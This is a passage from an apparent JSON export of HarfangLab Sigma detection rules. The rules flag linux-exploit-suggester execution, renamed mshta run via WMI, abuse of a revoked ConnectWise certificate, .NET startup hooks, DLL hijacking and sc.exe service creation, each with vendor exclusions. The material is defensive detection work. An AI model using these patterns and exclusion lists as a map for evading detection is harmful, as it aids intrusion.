"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.613389Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/mzet-/linux-exploit-suggester/",
"https://attack.mitre.org/techniques/T1595/002/"
],
"name": "t1595_002_linux_exp_suggester_bash.yml",
"content": "title: Linux-Exploit-Suggester Hacktool Executed via Bash\nid: 252c798b-019c-4d67-848f-3b675cd5c18f\ndescription: |\n Detects the execution of linux-exploit-suggester, an open-source shell script for suggesting privilege escalation exploits on Linux.\n Adversaries may use this script to identify a way to elevate their privileges.\n It is recommended to check for other suspicious activities by the process' parent.\nreferences:\n - https://github.com/mzet-/linux-exploit-suggester/\n - https://attack.mitre.org/techniques/T1595/002/\ndate: 2022/11/21\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.reconnaissance\n - attack.t1595.002\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Script.Bash\n - classification.Linux.HackTool.LinuxExploitSuggester\n - classification.Linux.Behavior.Discovery\n - classification.Linux.Behavior.PrivilegeEscalation\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection_script:\n CommandLine|contains: 'linux-exploit-suggester.sh'\n filter_script:\n ParentCommandLine|contains: 'linux-exploit-suggester.sh'\n\n selection_cmd:\n CommandLine:\n - \"grep -E -i ^networkmanager-vpnc|network-manager-vpnc-[0-9]+\"\n - \"grep -E -i ^polkit|policykit-1-[0-9]+\"\n\n condition: (selection_script and not filter_script) or selection_cmd\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "252c798b-019c-4d67-848f-3b675cd5c18f",
"rule_name": "Linux-Exploit-Suggester Hacktool Executed via Bash",
"rule_description": "Detects the execution of linux-exploit-suggester, an open-source shell script that suggests privilege escalation exploits on Linux.\nAdversaries may use this script to identify a way to elevate their privileges.\nIt is recommended to check for other suspicious activities performed by the process's parent.\n",
"rule_creation_date": "2022-11-21",
"rule_modified_date": "2025-04-14",
"rule_os": "linux",
"rule_status": null,
"rule_tactic_tags": [],
"rule_technique_tags": [
"attack.t1595.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "254f2253-5e75-41de-a4fb-bbfa86c1a831",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.604309Z",
"creation_date": "2026-03-23T11:45:34.604312Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.604320Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://unit42.paloaltonetworks.com/valak-evolution/",
"https://twitter.com/ForensicITGuy/status/1334734244120309760",
"https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/"
],
"name": "t1047_group_ta551_wmi_renamed_mshta.yml",
"content": "title: Possible Lateral Movement via Renamed MSHTA through WMI\nid: 254f2253-5e75-41de-a4fb-bbfa86c1a831\ndescription: |\n Detects the execution of a renamed mshta.exe binary by WMI (as a child of wmiprvse.exe).\n This technique is heavily used by the TA551 threat group to execute malicious payloads delivered through spear-phishing campaigns.\n It is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes for malicious content or actions.\nreferences:\n - https://unit42.paloaltonetworks.com/valak-evolution/\n - https://twitter.com/ForensicITGuy/status/1334734244120309760\n - https://app.any.run/tasks/6e90f38e-8b34-4e12-9a33-3bc5e3b4d81e/\ndate: 2020/12/08\nmodified: 2025/03/06\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1047\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Mshta\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_creation\ndetection:\n selection:\n ParentImage|endswith: '\\wmiprvse.exe'\n OriginalFileName: 'MSHTA.EXE'\n\n filter_image:\n Image|endswith: '\\mshta.exe'\n\n condition: selection and not 1 of filter_*\nlevel: critical\n# level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "254f2253-5e75-41de-a4fb-bbfa86c1a831",
"rule_name": "Possible Lateral Movement via Renamed MSHTA through WMI",
"rule_description": "Detects the execution of a renamed mshta.exe binary by WMI (as a child of wmiprvse.exe).\nThis technique is heavily used by the TA551 threat group to execute malicious payloads delivered through spear-phishing campaigns.\nIt is recommended to investigate the origin of this execution through the authentication telemetry and to analyze child processes for malicious content or actions.\n",
"rule_creation_date": "2020-12-08",
"rule_modified_date": "2025-03-06",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1047"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2557816c-987b-4020-8958-02526e2e549b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.096803Z",
"creation_date": "2026-03-23T11:45:34.096805Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.096809Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware",
"https://x.com/smica83/status/1977489233712717894",
"https://attack.mitre.org/techniques/T1553/002/"
],
"name": "t1553_002_connectwise_revoked_certificate.yml",
"content": "title: Process Executed Signed with Connectwise Revoked Certificate\nid: 2557816c-987b-4020-8958-02526e2e549b\ndescription: |\n Detects the execution of a process signed using the Connectwise revoked certificate.\n This certificate has been revoked because it was abused by threat actors to sign malicious ConnectWise binaries.\n Since March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing without breaking the signature.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.gdatasoftware.com/blog/2025/06/38218-connectwise-abuse-malware\n - https://x.com/smica83/status/1977489233712717894\n - https://attack.mitre.org/techniques/T1553/002/\ndate: 2025/10/13\nmodified: 2025/10/22\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1553.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.StolenCertificate\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ProcessSignatureSignerThumbprint: '4c2272fba7a7380f55e2a424e9e624aee1c14579'\n\n # Using Connectwise revoked certificate but not malicious\n exclusion_image:\n ProcessImage:\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.ClientService.exe'\n - '?:\\Program Files (x86)\\ScreenConnect Client (????????????????)\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files (x86)\\ScreenConnect\\Bin\\ScreenConnect.Service.exe'\n - '?:\\Windows\\LTSvc\\LTSVC.exe'\n - '?:\\Windows\\LTSvc\\LTTray.exe'\n - '?:\\Windows\\LTSvc\\LTSvcMon.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.ClientService.exe'\n - '?:\\Users\\\\*\\AppData\\Local\\Apps\\\\*\\\\????????.???\\\\????????.???\\\\*\\ScreenConnect.WindowsClient.exe'\n - '?:\\Program Files 
(x86)\\SAAZOD\\\\*'\n - '?:\\Program Files (x86)\\ITSPlatform\\\\*'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.ClientService.exe'\n - '*\\STAGO\\Stago.Psad.Client\\ScreenConnect\\ScreenConnect.WindowsClient.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2557816c-987b-4020-8958-02526e2e549b",
"rule_name": "Process Executed Signed with Connectwise Revoked Certificate",
"rule_description": "Detects the execution of a process signed with the revoked ConnectWise certificate.\nThis certificate was revoked because threat actors abused it to sign malicious ConnectWise binaries.\nSince March 2025, threat actors have been abusing validly signed ConnectWise binaries by embedding custom malicious content via Authenticode stuffing, which does not invalidate the signature.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2025-10-13",
"rule_modified_date": "2025-10-22",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1553.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2580b2f9-373b-4a4c-9b57-13e458627130",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.098306Z",
"creation_date": "2026-03-23T11:45:34.098308Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.098312Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable",
"https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_sideloading_dotnet_startup_hook.yml",
"content": "title: Dotnet Startup Hook Environment Variable Set\nid: 2580b2f9-373b-4a4c-9b57-13e458627130\ndescription: |\n Detects the registration of a dotnet startup hook using the DOTNET_STARTUP_HOOKS environment variable.\n Adversaries can register a malicious assembly that will be executed whenever a .net core application is started.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md#atomic-test-2---dll-side-loading-using-the-dotnet-startup-hook-environment-variable\n - https://medium.com/criteo-engineering/c-have-some-fun-with-net-core-startup-hooks-498b9ad001e1\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/12/23\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'Cmd.EXE'\n CommandLine|contains|all:\n - 'set '\n - 'DOTNET_STARTUP_HOOKS='\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2580b2f9-373b-4a4c-9b57-13e458627130",
"rule_name": "Dotnet Startup Hook Environment Variable Set",
"rule_description": "Detects the registration of a .NET startup hook using the DOTNET_STARTUP_HOOKS environment variable.\nAdversaries can register a malicious assembly that will be executed whenever a .NET Core application is started.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-12-23",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "258b150d-0fe4-48e0-93bc-09d02567ecb8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.592069Z",
"creation_date": "2026-03-23T11:45:34.592072Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.592080Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_microsoftedgesh.yml",
"content": "title: DLL Hijacking via microsoftedgesh.exe\nid: 258b150d-0fe4-48e0-93bc-09d02567ecb8\ndescription: |\n Detects potential Windows DLL Hijacking via microsoftedgesh.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'microsoftedgesh.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\USERENV.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "258b150d-0fe4-48e0-93bc-09d02567ecb8",
"rule_name": "DLL Hijacking via microsoftedgesh.exe",
"rule_description": "Detects potential Windows DLL hijacking via microsoftedgesh.exe.\nDLL hijacking takes advantage of the default Windows DLL search order by placing a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "25bdc370-c782-4157-b467-3e74718d8b59",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.074695Z",
"creation_date": "2026-03-23T11:45:34.074697Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.074702Z",
"rule_level": "low",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1543/003/"
],
"name": "t1543_003_manual_service_creation_with_sc.yml",
"content": "title: Service Created via sc.exe\nid: 25bdc370-c782-4157-b467-3e74718d8b59\ndescription: |\n Detects the manual creation of a Windows service using sc.exe.\n While sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate adversaries may be creating a Windows service to achieve persistence.\n It is recommended to investigate suspicious service creation events through sc.exe, specially if they are not part of an installation process, and validate the service binary path and account privileges.\nreferences:\n - https://attack.mitre.org/techniques/T1543/003/\ndate: 2022/12/02\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.persistence\n - attack.t1543.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Sc\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.ServiceCreation\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'sc.exe'\n CommandLine|contains|all:\n - ' create'\n - 'binPath='\n\n exclusion_logisync:\n GrandparentImage:\n - '?:\\Program Files (x86)\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n - '?:\\Program Files\\Logitech\\LogiSync\\sync-agent\\LogiSyncHandler.exe'\n\n exclusion_intel:\n CurrentDirectory|startswith:\n - '?:\\Program Files\\Intel\\'\n - '?:\\Program Files (x86)\\Intel\\'\n\n exclusion_installer:\n GrandparentImage:\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n - '?:\\Windows\\System32\\msiexec.exe'\n\n exclusion_listary:\n CommandLine|contains: ' ListaryService'\n\n exclusion_webcompanion:\n ParentImage|endswith: '\\WebCompanionInstaller.exe'\n\n exclusion_parsec:\n GrandparentImage|endswith: '\\parsec-windows.exe'\n\n exclusion_autodesk:\n GrandparentImage|endswith: '\\AdODIS-installer.exe'\n\n exclusion_dell:\n GrandparentImage|endswith: '\\invcol.exe'\n\n exclusion_hp:\n ParentImage:\n - '?:\\Program 
Files\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files (x86)\\HP\\HP Touchpoint Analytics Client Installer\\TAInstaller.exe'\n - '?:\\Program Files\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n - '?:\\Program Files (x86)\\Hewlett-Packard\\HP Touchpoint Manager\\Tools\\tainstaller.exe'\n\n exclusion_varian:\n CommandLine|contains: 'create VarianVDTRSDAgent binPath= *VMS.RemoteASD.VDTAgent.exe'\n ParentImage: '?:\\ProgramData\\VDT.exe'\n\n exclusion_asus_removetool:\n GrandparentImage: '?:\\Program Files\\ASUS\\ABM\\service\\RemoveTool.exe'\n\n exclusion_nable:\n ParentImage: '?:\\Program Files (x86)\\N-able Technologies\\Windows Agent\\bin\\agent.exe'\n CommandLine|contains: 'sc.exe create AutomationManagerAgent start= auto displayName= Automation Manager Agent binPath= ??:\\Program Files (x86)\\N-Able Technologies\\AutomationManagerAgent\\AutomationManager.AgentService.exe?'\n\n exclusion_trendmicro:\n ParentImage: '?:\\Program Files\\Trend Micro\\Deep Security Agent\\dsa.exe'\n CommandLine|contains: 'sc.exe create ds_nuagent start= disabled binpath= ??:\\Program Files\\Trend Micro\\Deep Security Agent\\nuagent\\ds_nuagent.exe?'\n\n exclusion_totalav:\n ParentImage: '?:\\Program Files (x86)\\TotalAV\\SecurityService.exe'\n CommandLine|contains: 'sc create ProtectedELAM binpath= ?:\\WINDOWS\\system32\\drivers\\protected_elam.sys'\n\n exclusion_mcafee:\n ParentImage:\n - '?:\\Program Files\\Common Files\\McAfee\\PEF\\Installer\\InstallPEF.exe'\n - '?:\\Program Files\\McAfee\\Temp??????????\\installer.exe'\n CommandLine|contains:\n - 'SC.exe create PEFService start= auto binpath= ??:\\Program Files\\Common Files\\McAfee\\PEF\\CORE\\PEFService.exe? DisplayName= McAfee PEF Service'\n - 'sc.exe create McAfee WebAdvisor binPath= ??:\\Program Files\\McAfee\\WebAdvisor\\ServiceHost.exe? 
start= auto DisplayName= McAfee WebAdvisor'\n\n exclusion_huawei:\n ParentImage:\n - '?:\\ProgramData\\Comms\\PCManager\\DriverUpgrade\\Update\\Downloaded\\\\*\\PCManager_Setup_*_x64.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\AccessoryCenter_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\BasicService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\HiviewService_Setup.exe'\n - '?:\\Program Files\\Huawei\\PCManager\\LCDEnhancement_step.exe'\n - '*\\MSPCManagerOffline.exe'\n CommandLine|contains:\n - 'sc.exe create HiConnectivityService DisplayName= Huawei Connectivity Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HiConnectivityService.exe?'\n - 'sc.exe create HiviewService DisplayName= Huawei Hiview Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\Hiview\\HiviewService.exe?'\n - 'sc.exe create HwDistributedMainService DisplayName= Huawei Distributed Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\HwDistributedMainService.exe?'\n - 'sc.exe create HwPCCoreService DisplayName= Huawei PC Core Service start= auto binPath= ??:\\Program Files\\Huawei\\BasicService\\BasicService.exe?'\n - 'sc.exe create LCD_Service DisplayName= Huawei LCD_Service start= auto binPath= ??:\\Program Files\\Huawei\\HwLcdEnhancement\\LCD_Service.exe?'\n - 'sc.exe create MBAMainService DisplayName= Huawei PCManager Windows Service start= auto binPath= ??:\\Program Files\\Huawei\\PCManager\\MateBookService.exe?'\n - 'sc.exe create PCManager Service start= auto binpath=?:\\Program Files\\Microsoft PC Manager\\MSPCManagerService.exe'\n\n exclusion_panda:\n GrandparentCommandLine:\n - '?:\\WINDOWS\\system32\\cmd.exe /c ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\vnc_configure.cmd ?:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe'\n - '?:\\Program Files (x86)\\Panda Cloud Systems Management\\CagService.exe'\n CommandLine:\n - 'SC create uvnc_service binpath= 
??:\\Program Files (x86)\\Panda Cloud Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n - 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\Panda Systems Management\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_centrastage:\n GrandparentImage: '?:\\Program Files (x86)\\CentraStage\\CagService.exe'\n CommandLine: 'SC create uvnc_service binpath= ??:\\Program Files (x86)\\CentraStage\\UltraVNC\\winvnc.exe? -service start= auto'\n\n exclusion_alienware:\n GrandparentImage: '?:\\Program Files\\Alienware\\Alienware Command Center\\OCControlService\\OCControl.Service.exe'\n CommandLine: 'sc create AMDRyzenMasterDriverV?? binPath= ?:\\Program Files\\Alienware\\AMDRyzenMasterDriver\\bin\\AMDRyzenMasterDriver.sys type= kernel start= auto'\n\n exclusion_rustdesk:\n CommandLine: 'sc create RustDesk binpath= \"?:\\Program Files\\RustDesk\\RustDesk.exe\" * start= auto DisplayName= RustDesk Service'\n ParentCommandLine:\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\WINDOWS\\TEMP\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Windows\\SystemTemp\\RustDesk_install.bat'\n - '?:\\Windows\\System32\\cmd.exe /C ?:\\Users\\\\*\\AppData\\Local\\Temp\\RustDesk_install.bat'\n\n exclusion_heat:\n CommandLine:\n - '?:\\Windows\\system32\\sc.exe create gzflt type= filesys displayname= gzflt start= demand binPath= ?:\\Windows\\system32\\drivers\\gzflt.sys depend= FltMgr group= FSFilter Anti-Virus tag= yes'\n - '?:\\Windows\\system32\\sc.exe create Trufos type= filesys displayname= Trufos start= demand binPath= ?:\\Windows\\system32\\drivers\\trufos.sys depend= FltMgr group= Boot Bus Extender tag= yes'\n GrandparentImage: '?:\\Program Files\\HEAT Software\\EMSSAgent\\\\??\\luarunner.exe'\n\n exclusion_mspecosystem:\n CommandLine:\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem 
Agent\\SolarWinds.MSP.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\SolarWinds MSP\\Ecosystem Agent\\SolarWinds.MSP.Ecosystem.WindowsAgent.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgentMaintenance start= auto DisplayName= Ecosystem Agent Maintenance binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgentMaint.exe'\n - '?:\\WINDOWS\\system32\\sc.exe create EcosystemAgent start= auto DisplayName= Ecosystem Agent binPath= ?:\\Program Files (x86)\\N-able Technologies\\Ecosystem Agent\\Nable.Ecosystem.WindowsAgent.exe'\n GrandparentImage: '?:\\ProgramData\\MSPEcosystem\\FileCache\\Upgrade\\Ecosystem.AgentSetup.exe'\n\n exclusion_admincenter:\n CommandLine|contains: 'binpath= ?:\\Program Files\\WindowsAdminCenter\\Service\\'\n ProcessGrandparentInternalName: 'Windows Admin Center (v2)'\n ProcessGrandparentSigned: 'true'\n ProcessGrandparentSignature: 'Microsoft Corporation'\n\n exclusion_matrix42:\n CommandLine|contains: 'binPath= \"?:\\Program Files\\Matrix42\\Maintenance Service\\Matrix42MaintenanceService.exe\"'\n ParentCommandLine|contains: 'Packages\\Matrix42\\UEM Agent Windows\\'\n\n exclusion_puppet_agent:\n ParentImage: '?:\\Program Files\\Puppet Labs\\\\*\\bin\\ruby.exe'\n\n condition: selection and not 1 of exclusion_*\nlevel: low\n#level: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "25bdc370-c782-4157-b467-3e74718d8b59",
"rule_name": "Service Created via sc.exe",
"rule_description": "Detects the manual creation of a Windows service using sc.exe.\nWhile sc.exe is a legitimate Windows tool for managing services, its manual use outside of an installer can indicate that adversaries are creating a Windows service to achieve persistence.\nIt is recommended to investigate suspicious service creation events through sc.exe, especially if they are not part of an installation process, and to validate the service binary path and account privileges.\n",
"rule_creation_date": "2022-12-02",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1543.003"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "25c7fcff-2700-4b0e-81d3-c467def3ef7e",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
